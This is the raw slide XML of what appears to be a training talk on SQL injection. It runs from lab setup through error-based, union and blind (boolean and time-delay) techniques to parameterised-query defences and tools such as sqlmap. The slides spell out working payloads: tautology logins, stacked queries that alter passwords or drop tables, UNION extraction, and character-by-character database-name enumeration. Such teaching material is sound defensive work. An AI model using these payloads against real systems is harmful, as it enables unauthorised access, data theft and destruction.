                          <a:effectLst/>
                        </a:rPr>
                        <a:t> apt-get update</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-ZA" sz="16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Z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apt-get install dotnet-dev-1.0.0-preview2-003131</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:endParaRPr lang="en-ZA" sz="16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7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361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932040" y="1203598"/>
            <a:ext cx="4104455" cy="3510390"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>From a terminal :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>Dotnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> restore </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>Dotnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> build</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>Dotnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Remote access:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>	--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>server.urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> http://0.0.0.0:5000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Host a asp.net core website on Linux.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203598"/>
            <a:ext cx="4608512" cy="34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1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75353"/>
            <a:ext cx="8046765" cy="2037156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23528" y="3291830"/>
            <a:ext cx="8280919" cy="1548172"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Debugging from VS Code:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Ensure you have the C# plugin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Ensure you have setup a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>launch.json</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Choose .NET Core Launch (web) and click the run button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Host a asp.net core website on Linux.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2993784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Host a asp.net core website on Linux.</a:t>
            </a:r>
          </a:p>
          <a:p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2" y="1186103"/>
            <a:ext cx="4308269" cy="28258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388" y="1185683"/>
            <a:ext cx="4024725" cy="28262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61007" y="4155926"/>
            <a:ext cx="7143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Hosting on Localhost			           Accessible from remote</a:t>
            </a:r>
            <a:endParaRPr lang="en-Z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31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– 3 Types.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35646"/>
            <a:ext cx="1728192" cy="1728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55" y="1824131"/>
            <a:ext cx="2504762" cy="149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131590"/>
            <a:ext cx="2438400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343584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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Error Based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343584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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Union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32240" y="3435846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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Blind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>Boolean</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Timed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254299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What is error based SQL injection?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Exploit the develops lack of hiding exceptions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>What is the easiest way to test this?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>‘   Single quote</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>‘ OR 1=1 -- ’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Wat is a Tautology?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>In logic, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>tautology</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> (from the Greek word τα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>υτολογί</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>α) is a formula which is true in every possible interpretation. ... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>Tautology</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>-based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>SQL injection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>attacks are usually bypass user authentication and extract data by inserting a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>tautology</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> in the WHERE clause of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> query.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-ZA" b="1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– Error Based.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202" y="573529"/>
            <a:ext cx="486054" cy="4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5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ZA" dirty="0"/>
              <a:t>Some examples:</a:t>
            </a:r>
          </a:p>
          <a:p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=1000’; update users set password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>foobar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>’--’</a:t>
            </a:r>
          </a:p>
          <a:p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=1000’; update item set price=price-1--’</a:t>
            </a:r>
          </a:p>
          <a:p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=1000’; insert into user… </a:t>
            </a:r>
          </a:p>
          <a:p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=1000’; drop table users--’</a:t>
            </a:r>
          </a:p>
          <a:p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=1000’; create login….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– Error Based.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202" y="573529"/>
            <a:ext cx="486054" cy="4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2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ZA" dirty="0"/>
              <a:t>Not all Databases are Equal!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.sqlinjection.net/table-names/</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://troels.arvin.dk/db/rdbms/</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>' UNION SELECT * FROM Votes -- '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>' UNION SELECT * FROM Makes -- '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>' UNION SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MakeId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>, Name,1 FROM Makes LIMIT 1 -- '</a:t>
            </a:r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- Union.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84978"/>
            <a:ext cx="920586" cy="5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20044" y="1113588"/>
            <a:ext cx="5903913" cy="1566174"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>“You can’t download a patch for human stupidity.”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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Kevin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>Mitnick</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="https://66.media.tumblr.com/0d68eacae9f42c1199b24d5915555680/tumblr_inline_o8rf32ioUX1qdm5mg_5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07854"/>
            <a:ext cx="1967359" cy="14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303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ZA" dirty="0"/>
              <a:t>Injecting data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>'; INSERT INTO votes (Comments, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBikeId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>UserId</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>) VALUES ('Hacked Bike', '0', '1'); -- '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Updating data:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>'; UPDATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBikes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> SET Power = 1000 WHERE Id = 1; -- '</a:t>
            </a:r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- Union.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84978"/>
            <a:ext cx="920586" cy="5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1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This is useful when data can’t be returned in the response or you can’t get any error messages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Boolean Based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>This style of injection is useful when the response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> be manipulated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0" err="1"/>
              <a:t>orderBy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>=if(Length(database())&gt;5,'id','votes')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Timed Based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>This style of injection is useful when the response </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>cant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> be manipulated.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>; if (1=1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t> delay '00:00:01' -- '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>; if (Length(database())&gt;5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0" err="1"/>
              <a:t>waitfor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t> delay '00:00:01' -- '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- Blind.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83518"/>
            <a:ext cx="643136" cy="6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2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98609" y="1329612"/>
            <a:ext cx="7307256" cy="3510390"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Enumerate database name lengths to detect a database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>SELECT Id, Name, Model FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBikes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> WHERE CC = '1000</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>and Length((database()))&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t> and 'x'='x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>' -- '</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>SELECT Id, Name, Model FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>MotorBikes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> WHERE CC = '1000</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t> and Length((database()))=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t> and 'x'='x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>' -- '</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Our Database’s name is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0" err="1"/>
              <a:t>pentestsql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t> (10 characters long)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- Enumeration.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249508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16484" y="1203598"/>
            <a:ext cx="5948004" cy="360040"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>Enumerate the name of the database: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- Enumeration.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03598"/>
            <a:ext cx="2692957" cy="32537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682400" y="3219822"/>
            <a:ext cx="1324803" cy="1440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1615642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SELECT Id, Name, Model FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0" err="1"/>
              <a:t>MotorBikes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t> WHERE CC = '1000' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t>(substring((database()),1,1))&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>122</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0"/>
              <a:t> and 'x'='x‘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7864" y="2322657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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>(substring((database()),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>,1))=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>112 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>… 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7864" y="2779851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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>(substring((database()),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>,1))=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>101</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t> … 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7864" y="3237045"/>
            <a:ext cx="398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/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0" err="1"/>
              <a:t>ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>(substring((database()),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t>,1))=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" sz="1600" dirty="0"/>
              <a:t> … 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63021" y="1923678"/>
            <a:ext cx="1324803" cy="1440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1681" y="2949237"/>
            <a:ext cx="1324803" cy="1440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Z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/>
      <p:bldP spid="11" grpId="0"/>
      <p:bldP spid="12" grpId="0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98608" y="1329612"/>
            <a:ext cx="8537888" cy="3510390"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Whitelist your string input or protect with regex.</a:t>
            </a:r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Securing against SQL injections.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9661"/>
            <a:ext cx="6192688" cy="282709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416094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98608" y="1329612"/>
            <a:ext cx="8537888" cy="3510390"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>If you are going to use SQL in your code ensure it is parameterised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Entity Framework Security considerations:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://msdn.microsoft.com/en-us/library/cc716760.aspx</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>OData:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ZA" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://media.blackhat.com/ad-12/Kalra/bh-ad-12-Oyedata-Kalra-WP.pdf</a:t>
            </a:r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Securing against SQL injections.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="663156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98608" y="1329612"/>
            <a:ext cx="8105839" cy="378042"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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BONUS Round - Some tools to help you automate since you suck at it!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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268052" y="1226245"/>
            <a:ext cx="1985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Windows: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err="1"/>
              <a:t>Havij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1203598"/>
            <a:ext cx="1985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Linux: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/>
                </a:solidFill>
              </a:rPr>
              <a:t>Burp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/>
              <a:t>Vega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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SqlMap</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA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63" y="1329612"/>
            <a:ext cx="3337838" cy="3771454"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1028" name="Picture 4" descr="http://hacktub.com/wp-content/uploads/2016/06/burpsu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270" y="1169307"/>
            <a:ext cx="1567810" cy="156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651870"/>
            <a:ext cx="27622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078" y="275634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21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What is Penetration Testing (Pen Testing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>The word injection means to inject something into a system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>SQL injection means injecting SQL into your database to either gain access to data that you shouldn't have access to.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Introduction.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34747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What is OWASP?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.owasp.org/</a:t>
            </a:r>
            <a:endParaRPr lang="en-ZA" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain applications that can be trusted. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>At OWASP you’ll find free and open </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Application security tools and standards </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Complete books on application security testing, secure code development, and secure code review </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Standard security controls and libraries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OWASP top 10.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79451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OWASP top 10.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11" y="1167705"/>
            <a:ext cx="7488832" cy="380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9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Download the latest ISO here:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.kali.org/downloads/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	ALWAYS CHECK THE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ZA" b="1" dirty="0"/>
              <a:t>SHA1Sum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Why would we want such a device?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0"/>
              <a:t>Why make it persistent?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ZA" dirty="0">
